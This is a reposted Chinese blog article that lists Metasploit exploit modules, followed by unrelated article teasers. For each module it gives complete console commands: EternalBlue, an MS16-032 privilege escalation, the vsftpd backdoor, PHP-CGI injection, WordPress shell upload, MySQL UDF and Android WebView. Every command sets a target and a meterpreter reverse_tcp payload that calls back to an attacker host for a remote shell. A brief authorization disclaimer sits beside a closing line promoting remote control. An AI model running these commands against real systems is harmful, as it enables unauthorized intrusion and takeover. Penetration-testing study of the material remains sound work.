metasploit/modules/exploits 有哪些模块，以及具体使用案例

🕗 发布于 2024-11-06 17:17 docker 容器运维系统架构 服务器

Metasploit框架的exploits模块用于利用已知漏洞执行代码，通常用于获取远程控制或执行特定任务。以下是一些常见的exploits模块及其使用案例：

1. Windows漏洞利用

exploit/windows/smb/ms17_010_eternalblue：利用SMBv1漏洞（永恒之蓝）。

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 4444
run

exploit/windows/local/ms16_032_secondary_logon_handle_privesc：利用Windows权限提升漏洞。

use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set SESSION 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 4444
run

2. Linux漏洞利用

exploit/unix/ftp/vsftpd_234_backdoor：利用vsftpd 2.3.4后门漏洞。

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.1
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 4444
run

exploit/unix/webapp/php_cgi_arg_injection：利用PHP-CGI参数注入漏洞。

use exploit/unix/webapp/php_cgi_arg_injection
set RHOSTS 192.168.1.1
set RPORT 80
set TARGETURI /vulnerable.php
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 4444
run

3. Web应用漏洞利用

exploit/multi/http/wp_admin_shell_upload：利用WordPress管理员后台上传shell漏洞。

use exploit/multi/http/wp_admin_shell_upload
set RHOSTS 192.168.1.1
set TARGETURI /wordpress
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 4444
run

exploit/multi/http/wordpress_file_upload：利用WordPress文件上传漏洞。

use exploit/multi/http/wordpress_file_upload
set RHOSTS 192.168.1.1
set TARGETURI /wordpress
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 4444
run

4. 数据库漏洞利用

exploit/unix/mysql/mysql_udf_payload：利用MySQL UDF（用户定义函数）漏洞。

use exploit/unix/mysql/mysql_udf_payload
set RHOSTS 192.168.1.1
set RPORT 3306
set USER dbuser
set PASS dbpass
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 4444
run

5. 其他

exploit/android/browser/webview_addjavascriptinterface：利用Android WebView AddJavascriptInterface漏洞。

use exploit/android/browser/webview_addjavascriptinterface
set RHOSTS 192.168.1.1
set RPORT 8080
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 4444
run

注意事项

使用这些模块时，请确保你有合法的权限和目的。
避免在未经授权的系统上进行测试，以免违反法律或政策。

通过这些模块和案例，你可以利用已知漏洞执行代码，从而获取远程控制或执行特定任务。

原文地址：https://blog.csdn.net/weixin_46483815/article/details/143388147

免责声明：本站文章内容转载自网络资源，如本站内容侵犯了原著者的合法权益，可联系本站删除。更多内容请关注自学内容网（zxcms.com）！

上一篇：掌握ElasticSearch（八）：聚集、文档间的关系
下一篇：CSP-S 2024 游记

不愧是阿里巴巴最新开源的Java面试笔记，30万字精华总结 + 面试1300问附答案整理
作为一个 Java 程序员，你平时总是陷在业务开发里，每天噼里啪啦忙敲着代码，上到系统开发，下到 Bug 修改，你感觉自己无所不能。然而偶尔的一次聚会，你听说和自己一起出道的同学早已经年薪 50 万，
阅读更多2024-11-08
Java | Leetcode Java题解之第538题把二叉搜索树转换为累加树
Java | Leetcode Java题解之第538题把二叉搜索树转换为累加树
阅读更多2024-11-08
leetcode哈希表（四）-快乐数
编写一个算法来判断一个数n是不是快乐数。如果n是快乐数就返回true；不是，则返回false。
阅读更多2024-11-08
netstat中sendq/recvq用于排查发送端发送数据的问题
以上接着查看发送端的网络问题发现延迟这些都正常，并且发送端使用syslog udp发送也是没问题的，所以判断为接收端问题，接收端处理太慢导致的，如此答复web同事后。web端最后排查是他们自身的问题。
阅读更多2024-11-08
10.桥接模式设计思想
本文介绍了桥接模式的设计思想和实现方法。桥接模式通过将抽象部分与实现部分分离，使它们可以独立变化，解决了多层继承带来的复杂性和耦合性问题。文章详细讲解了桥接模式的由来、定义、应用场景和实现步骤，并通过
阅读更多2024-11-08
苹果前面是什么？苹果签名的作用是什么？
我们先来讲一讲用的最广泛的企业签名，企业签名就是使用企业开发者账号给app进行签名，它的优势在于它对app的类型是没有限制的，而且它的下载数量也是没有限制的，这对于app开发者来说是非常便利的，这也就
阅读更多2024-11-08
celery在django项目中实现并发任务和定时任务
确保你能看到 Worker 的日志输出，以验证任务是否成功执行。启动 Celery Worker 和 Beat 在命令行中，启动 Celery Worker 和 Beat。设置定时任务使用 Cel
阅读更多2024-11-08
313页电力集团大数据应用支撑平台技术支撑服务项目技术投标方案
▲关注智慧方案文库，学习9000多份最新解决方案，其中 PPT、WORD超过7000多份，覆盖智慧城市多数领域的深度知识社区，稳定更新4年，日积月累，更懂行业需求。版权声明：本资讯内容、资料来源，均
阅读更多2024-11-08
Spring Cloud微服务：构建弹性、可扩展的分布式系统
Spring Cloud通过其丰富的工具和框架，帮助开发者快速构建弹性、可扩展的分布式系统。通过掌握Spring Cloud的核心概念和常见组件，你将能够构建高效、安全的微服务架构，推动企业实现数字化
阅读更多2024-11-08
TCP：确认机制、重传以及选择性确认（SACK）
数据包13023是主机A向主机B发送的一个纯ACK报文，确认已成功接收到主机B发送的序列号1至47110的数据，窗口大小为63802字节。
阅读更多2024-11-08